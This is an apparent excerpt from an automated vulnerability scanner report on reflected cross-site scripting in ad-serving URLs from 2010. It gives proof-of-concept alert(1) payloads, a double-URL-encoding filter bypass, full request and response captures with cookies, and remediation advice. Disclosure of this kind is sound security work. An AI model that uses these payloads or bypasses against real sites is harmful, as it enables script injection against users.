The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f2d6"-alert(1)-"3d73acd9ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1 HTTP/1.1 Host: vulnerable.verizon.host Proxy-Connection: keep-alive Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:08:22 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6687
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... =1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=&7f2d6"-alert(1)-"3d73acd9ef9=1http%3a%2f%2fwww.hotels.ca/hotel-deals/SLMcoupon_mms-444"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d262"-alert(1)-"96f8deb7f41 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3995.275551.SYMPATICOCANADA/B5002719;sz=300x250;ord=181825700?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41 HTTP/1.1 Host: vulnerable.verizon.host Proxy-Connection: keep-alive Referer: http://redcated/D21/iview/164326682/direct;wi.300;hi.250/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054795554fdf00000000/vibe=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:43 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6657
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... e=1/AAMSZ=300x250/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/189498318.189844667/164326682/direct/01%3fhref=4d262"-alert(1)-"96f8deb7f41http://www.hotels.ca/hotel-deals/SLMcoupon_mms-444"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = " ...[SNIP]...
2.14. http://vulnerable.verizon.host/adi/N6080.149339.8804879051621/B4137193.79 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vulnerable.verizon.host
Path:
/adi/N6080.149339.8804879051621/B4137193.79
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aec59"-alert(1)-"5a20f033947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Fri, 19 Nov 2010 23:27:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6742
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=&aec59"-alert(1)-"5a20f033947=1http%3a%2f%2flp.21st.com/sp/%3Fpid%3D10486EYBDWK"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c1c1"-alert(1)-"afd3afa7698 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Fri, 19 Nov 2010 23:26:22 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6714
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All ...[SNIP]... 2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nyrsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254462/R=0/*http://clk.redcated/goiframe/188992223.176758052/yhxxxdrv0010001133apm/direct/01?href=9c1c1"-alert(1)-"afd3afa7698http://lp.21st.com/sp/?pid=10486EYBDWK"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4db8c'-alert(1)-'76a9a340a18 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85571'-alert(1)-'e0c602a890c was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87d7b'-alert(1)-'549109f08e8 was submitted in the goto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.19. http://vulnerable.verizon.host/adj/N3282.nytimes.comSD6440/B3948326.5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vulnerable.verizon.host
Path:
/adj/N3282.nytimes.comSD6440/B3948326.5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a860'-alert(1)-'40e767fbc22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18f99'-alert(1)-'151cd29a63c was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b0aa'-alert(1)-'df99fff59 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9448d'-alert(1)-'fc0bfd338ee was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c063b'-alert(1)-'67246c81f2f was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e68e3'-alert(1)-'7c564df6c49 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f627'-alert(1)-'38dd3681b12 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 442a2'-alert(1)-'cd57e5a21a7 was submitted in the snx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87703'-alert(1)-'a236e466c18 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83023"%3balert(1)//6bee66d0b85 was submitted in the h parameter. This input was echoed as 83023";alert(1)//6bee66d0b85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/83023"%3balert(1)//6bee66d0b85 HTTP/1.1 Host: vulnerable.verizon.host Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Content-Type: text/html;charset=UTF-8 Date: Sat, 20 Nov 2010 03:33:59 GMT Connection: close
<html> <script type="text/javascript"> function processAdClickUrl() { window.top.location.replace("83023";alert(1)//6bee66d0b85?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAI ...[SNIP]...
2.29. http://vulnerable.verizon.host/click [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://vulnerable.verizon.host
Path:
/click
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f1fe"%3balert(1)//424e902531b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f1fe";alert(1)//424e902531b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /click;h=v8/3a57/f/340/*/u;224824464;3-0;0;55547540;4307-300/250;36706617/36724495/1;;~sscs=?http:/r.turn.com/r/tpclick/id/0IjLk-tYrjh16QEABQABAA/3c/http:/ads.bluelithium.com/clk?2,13%3Be575beac68a94423%3B12c665a8a07,0%3B%3B%3B2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAB4paZiwBAAAAAAAAADMyZGM1MmYyLWY0MzAtMTFkZi05NWEwLTAwMzA0OGQ2Njg4NgAzmSoAAAA=,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p986bk3%2FM%3D715481.14260249.14149315.1806201%2FD%3Dsports%2FS%3D25664825%3ALREC%2FY%3DYAHOO%2FEXP%3D1290214468%2FL%3DSel8aULEah79SQS9TNcPQwMMrnoX2kznACQACZ3S%2FB%3DPGTMAUJe5lE-%2FJ%3D1290207268687209%2FK%3DLJblLdnMfnL8ntuwJDSBWg%2FA%3D5761153%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,/url/&2f1fe"%3balert(1)//424e902531b=1 HTTP/1.1 Host: vulnerable.verizon.host Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response (redirected)
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Content-Type: text/html;charset=UTF-8 Date: Sat, 20 Nov 2010 03:34:10 GMT Connection: close
<html> <script type="text/javascript"> function processAdClickUrl() { window.top.location.replace("&2f1fe";alert(1)//424e902531b=1?2,13;e575beac68a94423;12c665a8a07,0;;;2519948374,XKUDAKcYFADDtWwAAAAAANv8GwAAAAAAAgAAAAIAAAAAAP8AAAAGEeQEHgAAAAAAZnQiAAAAAAApECUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAA ...[SNIP]...
The value of the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934 was submitted in the 210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id parameter. This input was echoed as df4be"style="x:expression(alert(1))"f02ba6ee934 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-dealsdf4be"style%3d"x%3aexpression(alert(1))"f02ba6ee934&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1 Host: vulnerable.verizon.host Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of the cnt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2 was submitted in the cnt parameter. This input was echoed as beb2f"style="x:expression(alert(1))"1aa717214d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /clk;210955744;24466695;s?http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=ski&cnt=PRObeb2f"style%3d"x%3aexpression(alert(1))"1aa717214d2&gcid=C11287x638&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1 Host: vulnerable.verizon.host Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of the gcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc was submitted in the gcid parameter. This input was echoed as 8c66e"style="x:expression(alert(1))"9cd31f2b2bc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /clk;210955717;24466695;s?http://www.orbitz.com/App/GDDC?deal_id=air-cheap-flight-deals&gcid=C11287x6388c66e"style%3d"x%3aexpression(alert(1))"9cd31f2b2bc&WT.mc_id=bn30&WT.mc_ev=click HTTP/1.1 Host: vulnerable.verizon.host Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cead%2522%253balert%25281%2529%252f%252f70bc5b86024 was submitted in the REST URL parameter 2. This input was echoed as 5cead";alert(1)//70bc5b86024 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead%2522%253balert%25281%2529%252f%252f70bc5b86024/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Fri, 19 Nov 2010 23:33:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1884
<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript"> function fpv() { try { var axo = new ActiveXObject('ShockwaveFlash.Shockwave ...[SNIP]... <scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313575cead";alert(1)//70bc5b86024/1354.0.iframe.200x33/1290209587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb was submitted in the REST URL parameter 2. This input was echoed as 99764"><script>alert(1)</script>e90710d87cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135799764%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee90710d87cb/1354.0.iframe.200x33/0.2084487870534576 HTTP/1.1 Host: ad.wsod.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;
Response
